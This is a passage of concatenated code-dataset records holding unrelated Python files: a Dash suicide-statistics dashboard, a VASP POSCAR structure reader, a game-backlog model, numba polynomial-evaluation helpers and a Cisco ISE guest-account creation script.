max=max(date_list),\n step=10,\n value=[min(date_list), max(date_list)],\n marks=dic_date,\n included=False\n )\n ),\n # html.Div(id='text-space')\n ])\n ]\n )\n )\n ]\n )\n ]\n ),\n\n\n html.H3('Age Related Factors'),\n\n dbc.Row(\n [\n dbc.Col([dbc.Card(dbc.CardBody([html.P([\n dbc.Row([\n dbc.Col([\n html.Iframe(\n srcDoc=src.dash_plots.age_plot(\n country_dropdown='Canada', source=data_clean_suicide_per_capita, year=[1985, 2016]),\n id='mark_point',\n style={'border-width': '0',\n 'width': '100%', 'height': '400px'}\n )\n ]),\n dbc.Col([\n html.Iframe(\n srcDoc=src.dash_plots.plot_suicide_boxplot(\n country_dropdown='Canada', data=suicide_dataset),\n id='boxplot',\n style={'border-width': '0',\n 'width': '100%', 'height': '400px'}\n ),\n ])\n ])])]))], width=12)]),\n html.Br(),\n\n html.H3('Sex Based Factors'),\n\n dbc.Row(\n [\n dbc.Col([dbc.Card(dbc.CardBody([html.P([\n html.Iframe(\n srcDoc=src.dash_plots.suicides_gender(\n data_suicides_by_gender),\n id='twinbar',\n style={'border-width': '0',\n 'width': '120%', 'height': '400px'}\n ),\n ])]))\n\n ])\n ]\n )])])\n\n# Sowmya's graph\n@ app.callback(\n Output('boxplot', 'srcDoc'),\n # Output('barplot', 'srcDoc'),\n [Input('country-dropdown', 'value')])\ndef update_output(chosencountry):\n return src.dash_plots.plot_suicide_boxplot(chosencountry, data=suicide_dataset)\n\n# Aditya's graph\n@ app.callback(\n Output('scatter', 'srcDoc'),\n Input('gender-dropdown', 'value'),\n Input('country-dropdown', 'value'),\n Input('age-dropdown', 'value'),\n # Input('generation-dropdown', 'value'),\n Input('range-slider', 'value')\n)\ndef update_output2(gender, country, age, year):\n return src.dash_plots.plot_suicide_gdp(data=suicide_dataset, sex=gender, country=country, age=age, year=year)\n\n# Poojitha's point graph:\n@ app.callback(\n Output('mark_point', 'srcDoc'),\n Input('country-dropdown', 'value'),\n Input('range-slider', 'value')\n)\ndef update_output4(chosencountry, year):\n return src.dash_plots.age_plot(country_dropdown=chosencountry, source=data_clean_suicide_per_capita, year=year)\n\n# Create a call back for the slider:\n#@ app.callback(\n# Output('text-space', 'children'),\n# Input('range-slider', 'value')\n#)\n#def update_output5(input_value):\n# year_input=pd.to_datetime(pd.Series(input_value), format='%Y')\n# year_input=year_input.dt.year\n# return year_input\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"275422184","text":"import os\nimport numpy as np\nfrom collections import OrderedDict\nfrom ase.io.vasp import read_vasp\nfrom ase.io.vasp import write_vasp\n\n\nclass StructureMagic():\n '''此类用于对于结构文件进行操作\n\n\n Attributes:\n\n '''\n\n def __init__(self, file=None, path=None):\n '''初始化结构文件所在路径和结构文件名称'''\n if file is None:\n self.file = 'POSCAR'\n else:\n self.file = file\n\n if path is None:\n self.path = os.getcwd()\n else:\n self.path = path\n self.cell = read_vasp(self.path + os.sep + self.file)\n\n def build_supercell(self, dim=[6, 6, 6], direct=True):\n '''超胞构建\n\n Args:\n dim:阔胞的大小,如[6,6,6]\n direct:布尔值,判断输出是否为direct\n Returns:\n name_supercell:超胞结构文件名称\n '''\n # 命名输出超胞的文件名\n name_supercell = str(self.cell.symbols) + '_supercell_' + str(dim[0]) + str(dim[1]) + str(dim[2])\n # 写入超胞\n write_vasp(self.path + os.sep + name_supercell, self.cell * np.array(dim), label=name_supercell,\n direct=direct, sort=True, vasp5=True)\n # 超胞结构\n self.supercell = self.cell * np.array(dim)\n return name_supercell\n\n\nclass StructureBasicInfo():\n '''此类用于读取结构文件POSCAR中的基本信息'''\n\n def __init__(self, file=None, path=None):\n '''初始化结构文件所在路径和结构文件名称'''\n if file is None:\n self.file = 'POSCAR'\n else:\n self.file = file\n\n if path is None:\n self.path = os.getcwd()\n else:\n self.path = path\n\n f = open(self.path + os.sep + self.file, 'r')\n self.lines = f.readlines()\n f.close()\n\n def get_system_name(self):\n '''获取POSCAR的system名称\n\n Returns:\n system_name:system名称\n '''\n system_name = str(self.lines[0].strip())\n return system_name\n\n def get_scaling_factor(self):\n '''获取POSCAR的缩放系数\n\n Returns:\n scaling_factor:缩放系数\n '''\n scaling_factor = np.array(\n str(self.lines[1]).strip().split()).astype(np.float)[0]\n return scaling_factor\n\n def get_lattice_matrix(self):\n '''获取POSCAR的晶格常数\n\n Returns:\n lattice_matrix:晶格常数\n '''\n a = np.array(str(self.lines[2]).strip().split()).astype(np.float)\n b = np.array(str(self.lines[3]).strip().split()).astype(np.float)\n c = np.array(str(self.lines[4]).strip().split()).astype(np.float)\n lattice_matrix = np.array([a, b, c])\n return lattice_matrix\n\n def get_atoms_info(self):\n '''获取POSCAR的原子信息\n\n Returns:\n atoms_info:[字典]原子信息,如Sn:2;O:4\n '''\n atoms_info = OrderedDict()\n atoms_keys = self.lines[5].strip().split()\n atoms_number = self.lines[6].strip().split()\n for i in range(len(atoms_keys)):\n atoms_info[atoms_keys[i]] = int(atoms_number[i])\n return atoms_info\n\n def get_coordinate_type(self):\n '''获取POSCAR的坐标轴信息\n Returns:\n coordinate_type:Direct or Cartesian\n '''\n coordinate_type = str(self.lines[7].strip())\n return coordinate_type\n\n def get_atoms_position_matrix(self):\n '''获取POSCAR的所有原子坐标\n\n Returns:\n atoms_position_matrix:所有原子坐标矩阵\n '''\n atoms_sum = self.get_atoms_sum()\n atoms_position_matrix = np.zeros((atoms_sum, 3))\n for i in range(atoms_sum):\n atoms_position_matrix[i] = np.array(\n str(self.lines[i + 8]).strip().split())[0:3].astype(np.float)\n return atoms_position_matrix\n\n def calAngleBetween2Vectors(self, vector0, vector1):\n '''\n 获取两个矢量的夹角\n '''\n angle = np.arccos(np.dot(vector0, vector1) /\n (np.linalg.norm(vector0) * np.linalg.norm(vector1)))\n return angle\n\n def calLatticeMatrix_Transformation_2D(self):\n LatticeMatrix = self.getLatticeMatrix()\n a = LatticeMatrix[0]\n b = LatticeMatrix[1]\n angle = self.calAngleBetween2Vectors(a, b)\n a_norm = np.linalg.norm(a)\n b_norm = np.linalg.norm(b)\n a = np.array([np.cos(angle / 2) * a_norm, np.sin(angle / 2) * a_norm, 0])\n b = np.array([np.cos(angle / 2) * b_norm, np.sin(angle / 2) * b_norm * (-1), 0])\n return a, b\n\n def get_atoms_sum(self):\n '''获取POSCAR的总原子数目\n\n Returns:\n atoms_sum:总原子数目\n '''\n atoms_info = self.get_atoms_info()\n atoms_sum = 0\n for value in atoms_info.values():\n atoms_sum += value\n return atoms_sum\n\n def get_volume(self):\n '''获取POSCAR的晶胞体积\n\n Returns:\n volume:晶胞体积\n '''\n sf = self.get_scaling_factor()\n a = np.array(str(self.lines[2]).strip().split()).astype(np.float) * sf\n b = np.array(str(self.lines[3]).strip().split()).astype(np.float) * sf\n c = np.array(str(self.lines[4]).strip().split()).astype(np.float) * sf\n volume = np.dot(np.cross(a, b), c)\n return volume\n\n def get_elements_position_matrix(self):\n '''获取POSCAR的同一元素的原子坐标\n\n Returns:\n elements_position_matrix:同一元素的原子坐标矩阵\n '''\n atoms_info = self.get_atoms_info()\n atoms_position_matrix = self.get_atoms_position_matrix()\n\n elements_position_matrix = OrderedDict()\n count = 0\n for key, value in atoms_info.items():\n elements_position_matrix[key] = np.zeros((value, 3))\n for i in range(value):\n elements_position_matrix[key][i] = atoms_position_matrix[i + count]\n count += value\n return elements_position_matrix\n","sub_path":"read_POSCAR/structure.py","file_name":"structure.py","file_ext":"py","file_size_in_byte":6118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"557548250","text":"import datetime\n\nclass Pile(object):\n def __init__(self, platforms=[], games=[]):\n self.platforms = platforms\n self.games = games\n\n def __repr__(self):\n return (\"PileGame({x.platforms!r}, {x.games!r})\").format(x=self)\n\n def search(self, exact_name=None, name=None, platform=None, priorities=None, genres=None):\n def has_substr(haystack, needle):\n return needle.lower() in haystack.lower()\n\n def has_any_substr(haystacks, needles):\n xs = [(h, n) for h in haystacks for n in needles if has_substr(h, n)]\n return len(xs) > 0\n\n gs = self.games\n\n if exact_name:\n gs = filter(lambda g: g.name.lower() == exact_name.lower(), gs)\n\n if name:\n gs = filter(lambda g: has_substr(g.name, name), gs)\n\n if platform:\n gs = filter(lambda g: g.platform.lower() == platform.lower(), gs)\n\n if priorities:\n gs = filter(lambda g: g.priority in priorities, gs)\n\n if genres:\n gs = filter(lambda g: has_any_substr(g.genres, genres), gs)\n\n return gs\n\nclass PilePlatform(object):\n def __init__(self, key, name):\n self.key = key\n self.name = name\n\n def __repr__(self):\n return (\"PilePlatform({x.key!r}, {x.name!r})\").format(x=self)\n\nclass PileGame(object):\n PRIORITY_HIGH=1\n PRIORITY_MED=2\n PRIORITY_LOW=3\n\n def __init__(self,\n name,\n platform,\n on_pile_date=datetime.date.today(),\n priority=PRIORITY_MED,\n hours=10,\n genres=[],\n notes=\"\"):\n self.name = name\n self.platform = platform\n self.on_pile_date = on_pile_date\n self.priority = priority\n self.hours = hours\n self.genres = genres\n self.notes = notes\n\n def __repr__(self):\n return (\"PileGame({x.name!r}, \"\n + \"{x.platform!r}, \"\n + \"{x.on_pile_date!r}, \"\n + \"{x.priority!r}, \"\n + \"{x.hours!r}, \"\n + \"{x.genres!r}, \"\n + \"{x.notes!r})\").format(x=self)\n","sub_path":"Gomer/gomer/domain.py","file_name":"domain.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"421590682","text":"# TODO\n# for Ahead-Of-Time Compilation:\n# from numba.pycc import CC\n# cc = CC('compiled_helpers', )\n# # Uncomment the following line to print out the compilation steps\n# cc.verbose = True\n\n\n# precompiled time critical helper functions\nimport numpy as np\nfrom numba import b1, f8, jit, u4\n\n\n# TODO define and import dtypes globally\n# @jit(f8(f8[:], f8[:], u4[:, :]), nopython=True, cache=True)\ndef naive_eval(x, coefficients, exponents):\n nr_coeffs = len(coefficients)\n # nr_monomials,nr_dims = exponents.shape\n # assert nr_monomials == nr_coeffs\n # assert len(x) == nr_dims\n acc = 0.0\n for i in range(nr_coeffs):\n acc = acc + coefficients[i] * np.prod(np.power(x, exponents[i, :]))\n return acc\n\n # equivalent one liner:\n # TypingError: numba doesn't support kwarg for prod\n # return np.sum(coefficients.T * np.prod(np.power(x, exponents), axis=1), axis=1)[0]\n\n\n# @cc.export('eval_compiled', 'f8(f8[:], f8[:], u4[:, :], u4[:, :], u4[:, :], u4[:, :], b1[:], u4)')\n@jit(f8(f8[:], f8[:], u4[:, :], u4[:, :], u4[:, :], u4[:, :], b1[:], u4), nopython=True, cache=True, debug=True)\ndef eval_recipe(x, value_array, copy_recipe, scalar_recipe, monomial_recipe, tree_recipe, tree_ops, root_value_address):\n # IMPORTANT: the order of following the recipes is not arbitrary!\n # scalar factors need to be evaluated before monomial factors depending on them...\n\n # in order to evaluate scalar factors with exponent 1, no exponentiation operation is required\n # simply copy the values of x to the value array\n # copy recipe instruction encoding: target, source\n # [target, source] = copy_recipe[i, :]\n for i in range(copy_recipe.shape[0]):\n # value_array[target] = x[source1]\n value_array[copy_recipe[i, 0]] = x[copy_recipe[i, 1]]\n\n # print('computing scalar factors: ...')\n # scalar recipe instruction encoding: target, source, exponent\n # [target, source1, exponent] = scalar_recipe[i, :]\n for i in range(scalar_recipe.shape[0]):\n # print('value[{}] = {} ^ {}'.format(target, x[source1], exponent))\n # value_array[target] = x[source1] ** exponent\n value_array[scalar_recipe[i, 0]] = x[scalar_recipe[i, 1]] ** scalar_recipe[i, 2]\n\n # # DEBUG:\n # accessed_idxs = set()\n\n # print('computing monomial factors: ...')\n # monomial recipe instruction encoding: target, source1, source2\n # [target, source1, source2] = monomial_recipe[i, :]\n for i in range(monomial_recipe.shape[0]):\n # print('value[{}] = {} * {} (idx: {}, {})'.format(target, value_array[source1], value_array[source2], source1,\n # source2))\n # value_array[target] = value_array[source1] * value_array[source2]\n value_array[monomial_recipe[i, 0]] = value_array[monomial_recipe[i, 1]] * value_array[monomial_recipe[i, 2]]\n\n # # DEBUG:\n # accessed_idxs.add(monomial_recipe[i, 1])\n # accessed_idxs.add(monomial_recipe[i, 2])\n\n # print('evaluating factorisation tree: ...')\n # tree recipe instruction encoding: target, source\n # [target, source] = tree_recipe[i, :]\n # separate operation array: *op_id*\n # value_array[target] = value_array[target] *op* value_array[source]\n for i in range(tree_recipe.shape[0]):\n target = tree_recipe[i, 0]\n source = tree_recipe[i, 1]\n if tree_ops[i]: # ADDITION: 1\n # print('value[{}] = {} + {}'.format(target, value_array[target], value_array[source1]))\n # value_array[target] = value_array[target] + value_array[source1]\n value_array[target] = value_array[target] + value_array[source]\n else: # MULTIPLICATION: 0\n # print('value[{}] = {} * {}'.format(target, value_array[target], value_array[source1]))\n # value_array[target] = value_array[target] * value_array[source1]\n value_array[target] = value_array[target] * value_array[source]\n\n # # DEBUG:\n # accessed_idxs.add(target)\n # accessed_idxs.add(source)\n\n # # DEBUG:\n # all_idxs = {x for x in range(len(value_array))}\n # non_accessed_idxs = all_idxs - accessed_idxs\n # # coefficients are stored in the indices until one before the root address\n # coefficient_idxs = {x for x in range(root_value_address)}\n # non_accessed_coefficients = non_accessed_idxs & coefficient_idxs\n # if len(non_accessed_coefficients) > 0:\n # raise ValueError(f'BUG: these coefficients have been accessed: {non_accessed_coefficients}')\n #\n # # NOTE: no indices must be accessed when the polynomial is a constant\n # if len(non_accessed_idxs) > 0 and len(value_array) > 1:\n # raise ValueError(f'BUG: these idxs have been accessed: {non_accessed_idxs}')\n\n return value_array[root_value_address] # return value of the root node\n\n\n@jit(u4(u4[:]), nopython=True, cache=True)\ndef num_ops_1D_horner(unique_exponents):\n \"\"\"\n :param unique_exponents: np array of unique exponents sorted in increasing order without 0\n :return: the number of operations of the one dimensional Horner factorisation\n without counting additions (just MUL & POW) and without considering the coefficients\n\n\n NOTE: in 1D the Horner factorisation is both unique and optimal (minimal amount of operations)\n \"\"\"\n nr_unique_exponents = unique_exponents.shape[0]\n # the exponent 0 is not present!\n assert not np.any(unique_exponents == 0)\n\n if nr_unique_exponents == 0:\n return 0\n\n # one MUL operation is required !between! all factors in the factorisation chain\n # the amount of factors (= \"length of factorisation chain\") is equal to the amount of unique existing exponents\n num_ops = nr_unique_exponents - 1\n\n # start with exponent 0 (not in unique exponents)\n # the difference between one and the next exponent determines if a POW operation is needed to evaluate a factor\n # unique exponents are sorted: prev_exp < exp\n prev_exp = 0\n for i in range(nr_unique_exponents):\n exp = unique_exponents[i]\n if exp - prev_exp >= 2:\n num_ops += 1 # 1 POW operation\n prev_exp = exp\n\n return num_ops\n\n\n@jit(u4(u4[:, :]), nopython=True, cache=True)\ndef true_num_ops(exponent_matrix):\n \"\"\"\n without counting additions (just MUL & POW) and but WITH considering the coefficients (1 MUL per monomial)\n \"\"\"\n num_ops = 0\n for monomial_nr in range(exponent_matrix.shape[0]):\n for dim in range(exponent_matrix.shape[1]):\n exp = exponent_matrix[monomial_nr, dim]\n if exp > 0:\n # per scalar factor 1 MUL operation is required\n num_ops += 1\n if exp >= 2:\n # for scalar factors with exponent >= 2 additionally 1 POW operation is required\n num_ops += 1\n\n return num_ops\n\n\n@jit(u4[:](u4, u4[:], u4[:], u4[:, :]), nopython=True, cache=True)\ndef compile_usage(dim, usage_vector, unique_exponents, exponent_matrix):\n \"\"\"\n :return: a vector with the usage count of every unique exponent\n \"\"\"\n\n for i in range(exponent_matrix.shape[0]):\n exp = exponent_matrix[i, dim]\n for j in range(len(unique_exponents)):\n if exp < unique_exponents[j]:\n break\n usage_vector[j] += 1\n\n return usage_vector\n\n\n@jit(b1[:](u4, b1[:], u4[:], u4[:], u4[:, :]), nopython=True, cache=True)\ndef compile_valid_options(dim, valid_option_vector, usage_vector, unique_exponents, exponent_matrix):\n if len(valid_option_vector) == 0:\n # there are no unique exponents\n return valid_option_vector\n\n usage_vector = compile_usage(dim, usage_vector, unique_exponents, exponent_matrix)\n\n for exp_idx in range(usage_vector.size):\n # stop at the highest exponent having a usage >=2\n if usage_vector[exp_idx] >= 2:\n valid_option_vector[exp_idx] = True\n else:\n # all higher exponents have a lower usage!\n break\n\n return valid_option_vector\n\n\n@jit(u4(u4, u4, u4[:, :]), nopython=True, cache=True)\ndef count_usage(dim, exp, exponent_matrix):\n \"\"\"\n :return: the amount of times a scalar factor appears in the monomials\n \"\"\"\n\n usage_cnt = 0\n for i in range(exponent_matrix.shape[0]):\n if exponent_matrix[i, dim] >= exp:\n usage_cnt += 1\n\n return usage_cnt\n\n\n@jit(u4(u4, u4), nopython=True, cache=True)\ndef factor_num_ops(dim, exp):\n \"\"\"\n :return: the amount of operations required to evaluate the scalar factor\n \"\"\"\n if exp >= 2:\n # 1 MUL + 1 POW\n return 2\n else:\n # 1 MUL\n return 1\n","sub_path":"multivar_horner/helpers_fcts_numba.py","file_name":"helpers_fcts_numba.py","file_ext":"py","file_size_in_byte":8637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"75571300","text":"import sys\nfrom inspect import getframeinfo, stack\nimport requests, base64\nimport json\nimport time\nfrom datetime import datetime, timezone , timedelta\nimport re\nimport random\nfrom dicttoxml import dicttoxml\n\n\n\"\"\"\nG_CISCO_ISE_Domain = ''\nG_sponsor_username = 'summit.cwa.sponsor'\nG_sponsor_Password = ''\nG_guestType = 'Contractor (default)'\nG_portalId= ''\nG_Duration = '2 hours'\nG_Location = 'Harman'\nG_Reason_For_Visit =r'''Demo \nretyu\nftgyhjuk\npurpose'''\n\nG_User_Type = 'Bulk'\nG_user_firstName = 'test_user'\nG_user_lastName = re.sub(r'^\"|\"$', '', r'''\"12'34'\"\"''')\nprint(\"G_user_lastName =======>\",G_user_lastName)\n\nG_User_Type = 'Bulk'\nG_Username_Prefix = 'AR_testing'\nG_Guest_User_Count = '3'\n\nG_Requester_Name = \"Nayana\"\n\"\"\"\n\n# \"\"\"\nG_CISCO_ISE_Domain = re.sub(r'^\"|\"$', '', r'''[*CISCO_ISE_Domain*]''')\nG_sponsor_username = re.sub(r'^\"|\"$', '', r'''[*SponsorUsername*]''')\nG_sponsor_Password = re.sub(r'^\"|\"$', '', r'''[*SponsorPassword*]''')\nG_guestType = re.sub(r'^\"|\"$', '', r'''[*GuestType*]''')\nG_portalId = re.sub(r'^\"|\"$', '', r'''[*ISE_PortalID*]''')\nG_Duration = re.sub(r'^\"|\"$', '', r'''[*Duration*]''')\nG_Location = re.sub(r'^\"|\"$', '',r'''[*Location*]''')\nG_Reason_For_Visit = re.sub(r'^\"|\"$', '', r'''[*ReasonForVisit*]''')\nG_User_Type = re.sub(r'^\"|\"$', '', r'''[*UserType*]''')\n\nG_user_firstName = re.sub(r'^\"|\"$', '', r'''[*UserFirstName*]''')\nG_user_lastName = re.sub(r'^\"|\"$', '', r'''[*UserLastName*]''')\n\nG_Username_Prefix = re.sub(r'^\"|\"$', '', r'''[*UsernamePrefix*]''')\nG_Guest_User_Count = re.sub(r'^\"|\"$', '', r'''[*GuestUserCount*]''')\nG_Requester_Name = re.sub(r'^\"|\"$', '', r'''[*RequesterName*]''')\n# \"\"\"\n\n\n\n# Module used for Logging\ndef LogMessage(ErrType, code, Message, RaisedExc='DEFAULT'):\n\n '''\n Function: LogMessage\n\n .SYNOPSIS:\n This module is used for printing erorr message on the screen\n\n .DESCRIPTION:\n This module will help in printing the verbose message or log error message on screen\n\n .DEPENDENCIES:\n module required: inspect\n\n .PARAMETER ALL:\n [string] ErrType: type of error key word(Error:Error, Exception:Exc, Information:INF)\n [string] code: Specific code for the error message\n [string] Message: Log Message\n [string] RaisedExc: exception type name\n\n .OUTPUTS:\n no return value\n\n .EXAMPLE 1:\n LogMessage('INF',\"[0-00-000-0000]\" ,\"Message to be logged\")\n\n .NOTES: None\n '''\n\n #getting calling module details\n caller = getframeinfo(stack()[1][0])\n Module_Name= caller.filename + \"/\" + stack()[1][3]\n linenumber = str(caller.lineno)\n\n if (ErrType == 'ERR'):\n exc_type, exc_obj, exc_tb = sys.exc_info()\n #fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n print(\"\\nERR : {0} [{1}|{2}] : {3}, {4},{5}\".format(code,Module_Name,linenumber,Message, str(RaisedExc), exc_type))\n\n elif (ErrType == 'INF'):\n print(\"\\nINF : {0} [{1}|{2}] : {3}\".format(code, Module_Name, linenumber, Message))\n\n else:\n print(\"\\nERR : {0} [{1}|{2}] : {3}\".format(code, Module_Name, linenumber, Message))\n\n\ndef Valid_Sponsor_Account(url, username, password):\n '''\n Function: Valid_Sponsor_Account\n\n .SYNOPSIS:\n This module is used to validate the if the provided Sponsor account details are valid or not\n\n .DESCRIPTION:\n This module is used to validate the if the provided Sponsor account details are valid or not\n\n .DEPENDENCIES:\n module required: Requests\n\n .PARAMETER ALL:\n [string] url: String XML data\n [string] username: Sponsor account name\n [string] password: Sponsor account password\n\n .OUTPUTS:\n No retun data\n\n .EXAMPLE 1:\n Url = 'a5163283212/11/2018 06:5312/12/2018 06:532 day(s)Demo purposea6786758412/11/2018 06:5312/12/2018 06:532 day(s)Demo purpose02SuccessSuccessfully fetched the user account Details'\n user_name = \"Guest\"\n password = \"test@123\"\n Valid_Sponsor_Account(Url, user_name, password)\n\n .NOTES: None\n '''\n\n try:\n url += '/ers/config/guestuser/versioninfo'\n LogMessage('INF', \"[0-00-000-0000]\",\"URL ======>\"+url)\n creds = str.encode(':'.join((username, password)))\n encodedAuth = bytes.decode(base64.b64encode(creds))\n\n headers = {\n 'accept': \"application/json\",\n 'content-type': \"application/json\",\n 'authorization': \" \".join((\"Basic\", encodedAuth)),\n 'cache-control': \"no-cache\"\n }\n\n response = requests.post(url, headers=headers)\n if (response.status_code == 401):\n LogMessage(\"ERR\", \"[0-01-003-0004]\", \"ISE API Returned 401 error, Invalid Sponsor Account or Domain Name please check the Inputs\")\n exit(1)\n\n except Exception as err:\n LogMessage(\"ERR\", \"[0-01-003-0004]\", \"Error Invoking the CISCO ISE Portal Check the Details. Error: \" + str(err))\n exit(1)\n\nclass Guest_user_details:\n\n def get_date(self, duration):\n '''\n Function: get_date\n\n .SYNOPSIS:\n This module is used to get the to and from timestamp based on the duration sent\n\n .DESCRIPTION:\n This module is used to get the to and from timestamp based on the duration sent. the to timestamp would be current\n UTC time and From will be the time duration of to_time + duration\n\n .DEPENDENCIES:\n None\n\n .PARAMETER ALL:\n [string] duration: duration for which the timestamps as to be fetched\n\n .OUTPUTS:\n [string] days: days count\n [string] to_date: to timestamp in string\n [string] from_date: from timestamp in string\n\n .EXAMPLE 1:\n duration = '2 days'\n days, to_date, from_date =get_date(duration)\n\n .NOTES: None\n '''\n\n from_timestamp = (datetime.now(timezone.utc))\n from_date = from_timestamp.strftime('%m/%d/%Y %H:%M')\n LogMessage('INF', \"[0-00-000-0000]\", \"from_date =====> \" + from_date)\n\n to_date = ''\n days = 0\n to_timestamp = ''\n try:\n # getting only the digit part of the duration variable\n delta_count = int(re.sub(\"\\D\", \"\", duration.replace(\" \", \"\")))\n LogMessage('INF', \"[0-00-000-0000]\", \"duration ===> \"+duration)\n LogMessage('INF', \"[0-00-000-0000]\", \"Delta count ====> \"+str(delta_count))\n\n # based on if it's month or days or hours get the delta time period\n\n if 'hour' in duration.lower():\n to_timestamp = (from_timestamp + timedelta(hours=delta_count))\n to_date = to_timestamp.strftime('%m/%d/%Y %H:%M')\n\n elif 'day' in duration.lower():\n to_timestamp = (from_timestamp + timedelta(days=delta_count))\n to_date = to_timestamp.strftime('%m/%d/%Y %H:%M')\n\n elif 'month' in duration.lower():\n to_timestamp = (from_timestamp + timedelta(days=(30*delta_count)))\n to_date = to_timestamp.strftime('%m/%d/%Y %H:%M')\n\n elif 'year' in duration.lower():\n to_timestamp = (from_timestamp + timedelta(days=(365 * delta_count)))\n to_date = to_timestamp.strftime('%m/%d/%Y %H:%M')\n\n days = (to_timestamp.date() - from_timestamp.date()).days\n days += 1\n\n # LogMessage('INF', \"[0-00-000-0000]\", \"to_date =======> \"+to_date)\n # LogMessage('INF', \"[0-00-000-0000]\", \"Valid days =====> \"+str(days))\n\n except Exception as err:\n LogMessage('ERR', \"[3-01-004-0001]\", \"Failed to fetch the Duration from the Request details\", str(err))\n exit(1)\n\n return days, from_date, to_date\n\n # API invocation for creating the guest user\n def Create_Guest_user(self, url, headers, body):\n '''\n Function: Create_Guest_user\n\n .SYNOPSIS:\n This module includes API invocation single Guest Account creation\n\n .DESCRIPTION:\n This module includes API invocation single Guest Account creation\n If the API invocation failed due to network issue the API will be invoke again after 1,3,5 min time intervals\n\n .DEPENDENCIES:\n Required Module : Requests,base64\n\n .PARAMETER ALL:\n [string] url: CISCO ISE Domain Name\n [dict] headers: Request header\n [dict] body: Request payload\n\n .OUTPUTS:\n [string] Guest_user_ID: Created Guest user account ID\n\n .EXAMPLE 1:\n Domain_name= '*.harman.com:9060'\n reds = str.encode(':'.join((G_sponsor_username, G_sponsor_Password)))\n encodedAuth = bytes.decode(base64.b64encode(creds))\n headers = {\n 'accept': \"application/json\",\n 'content-type': \"application/json\",\n 'authorization': \" \".join((\"Basic\", encodedAuth)),\n 'cache-control': \"no-cache\"\n }\n\n payload = {\n \"GuestUser\" : {\"guestType\": \"Contractor (default)\",\n \"portalId\": \"40963c00-2e02-11e8-ba71-005056872c7f\",\n \"guestInfo\" : {\"firstName\": \"Sujeet_test\",\"lastName\": 1234,\"enabled\": true},\n \"guestAccessInfo\" : {\"validDays\": \"1\", \"fromDate\": \"12/07/2018 08:09\",\n \"toDate\": \"12/07/2018 15:00\", \"location\": \"Harman\"}}\n }\n ID =Create_Guest_user(Domain_name, headers,payload)\n\n .NOTES: None\n '''\n\n url += '/ers/config/guestuser'\n LogMessage('INF', \"[0-00-000-0000]\", \"Create Guest User API ====>\"+url)\n\n Guest_user_ID=''\n time_interval = [0, 60, 120, 180]\n tries = 4\n for retry_time in time_interval:\n try:\n time.sleep(retry_time)\n response = requests.post(url, data=json.dumps(body), headers=headers)\n response.raise_for_status()\n\n LogMessage('INF', \"[0-00-000-0000]\", \"Webservice response =====> \" + str(response))\n\n if (response.status_code == 201):\n print(\"API Header =====>\",response.headers)\n Guest_user_ID = response.headers['Location'].rsplit('/', 1)[1]\n\n else:\n LogMessage('ERR', \"[0-00-000-0000]\", \"Couldn't create the Guest user account. API returned a status code ==>{0} \".format(str(response.status_code)) )\n\n except (requests.exceptions.ConnectionError, requests.exceptions.Timeout) as err:\n LogMessage('ERR', \"[3-01-004-0001]\", \"API Error Encountered. couldn't Create the Guest user Account. Retrying. . . . .\", str(err))\n tries -= 1\n if tries != 0: # until tries count is zero\n continue\n else:\n LogMessage('ERR', \"[3-01-004-0001]\", \"Failed to create the Guest user Account.\", str(err))\n #sys.exit(1)\n\n except Exception as e:\n # catastrophic error. bail.\n error_message = response.json()['ERSResponse']['messages'][0]['title']\n LogMessage('ERR', \"[3-01-004-0001]\", \"API gave an exception ======>{0} \\nerror message: {1}\".format(e, error_message))\n #sys.exit(1)\n break\n return Guest_user_ID\n\n def Create_Bulk_Users(self, url, headers, body):\n '''\n Function: Create_Bulk_Users\n\n .SYNOPSIS:\n This module includes API invocation bulk Guest Account creation\n\n .DESCRIPTION:\n This module includes API invocation bulk Guest Account creation\n If the API invocation failed due to network issue the API will be invoke again after 1,3,5 min time intervals\n\n .DEPENDENCIES:\n Required Module : Requests,base64\n\n .PARAMETER ALL:\n [string] url: CISCO ISE Domain Name\n [dict] headers: Request header\n [dict] body: Request payload\n\n .OUTPUTS:\n [string] Bulk_ID: ID of the bulk request\n\n .EXAMPLE 1:\n Domain_name= '*.harman.com:9060'\n reds = str.encode(':'.join((G_sponsor_username, G_sponsor_Password)))\n encodedAuth = bytes.decode(base64.b64encode(creds))\n headers = {\n 'accept': \"application/xml\",\n 'content-type': \"application/xml\",\n 'authorization': \" \".join((\"Basic\", encodedAuth)),\n 'cache-control': \"no-cache\"\n }\n\n payload = '12/11/2018 21:00Harman12/11/2018 23:001trueAR_testing6192Contractor (default)40963c00-2e02-11e8-ba71-005056872c7f'\n bulk_ID = Create_Bulk_Users(Domain_name, headers,payload)\n\n .NOTES: None\n '''\n url += '/ers/config/guestuser/bulk/submit'\n LogMessage('INF', \"[0-00-000-0000]\", \"Create Bulk Guest User API ====>\" + url)\n LogMessage('INF', \"[0-00-000-0000]\", \"Create Bulk Guest User Request Payload====>\" + str(body))\n\n bulk_ID = ''\n time_interval = [0, 60, 120, 180]\n tries = 4\n for retry_time in time_interval:\n try:\n time.sleep(retry_time)\n response = requests.put(url, data=body, headers=headers)\n response.raise_for_status()\n\n LogMessage('INF', \"[0-00-000-0000]\", \"Webservice response =====> \" + str(response))\n\n if (response.status_code == 202):\n print(\"header ======> \",response.headers)\n bulk_ID = response.headers['Location'].rsplit('/', 1)[1]\n LogMessage('INF', \"[0-00-000-0000]\",\"Bulk ID ======>\"+bulk_ID)\n\n else:\n LogMessage('ERR', \"[0-00-000-0000]\",\n \"Couldn't create Bulk Guest user request. API returned a status code ==>{0} \".format(\n str(response.status_code)))\n\n except (requests.exceptions.ConnectionError, requests.exceptions.Timeout) as err:\n LogMessage('ERR', \"[3-01-004-0001]\",\n \"API Error Encountered. couldn't Create bulk Guest user request. Retrying. . . . .\", str(err))\n tries -= 1\n if tries != 0: # until tries count is zero\n continue\n else:\n LogMessage('ERR', \"[3-01-004-0001]\", \"Failed to create bulk guest user request.\", str(err))\n # sys.exit(1)\n\n except requests.HTTPError as e:\n 